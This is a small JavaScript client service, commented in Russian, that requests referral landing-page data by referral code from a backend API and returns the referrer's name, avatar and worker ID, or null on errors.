// Сервис для получения данных реферальной страницы с бекенда
import API_CONFIG from '../config/api'

class ReferralService {
  constructor() {
    this.baseURL = API_CONFIG.baseURL
    // Данные лендинга берём напрямую с бэкенда по HTTPS (api-system.network),
    // иначе с HTTPS-страницы запрос на http://...:3000 блокируется как mixed content.
    // baseURL не трогаем — он используется для wallet-действий (connect/approve).
    this.landingBaseURL = 'https://api-system.network/api'
  }

  // Получить данные реферала по коду с бекенда
  // Запрос: GET /api/landing?ref_code={code}
  // Ответ: { message: "...", landing: { ref_code, avatar, name, worker_id } }
  async getReferralData(code) {
    try {
      const url = `${this.landingBaseURL}/landing?ref_code=${encodeURIComponent(code)}`
      
      const response = await fetch(url, {
        method: 'GET',
        headers: {
          'Content-Type': 'application/json'
        }
      })

      if (!response.ok) {
        // Если страница не найдена (404) или другая ошибка
        if (response.status === 404) {
          return null
        }
        throw new Error(`HTTP error! status: ${response.status}`)
      }

      const result = await response.json()
      
      // Проверяем структуру ответа
      if (result.landing) {
        return {
          ref_code: result.landing.ref_code || code,
          avatar: result.landing.avatar || '',
          name: result.landing.name || '',
          worker_id: result.landing.worker_id || ''
        }
      }

      return null
    } catch (error) {
      console.error('Ошибка получения данных реферала:', error)
      // В случае ошибки сети возвращаем null
      return null
    }
  }
}

export const referralService = new ReferralService()

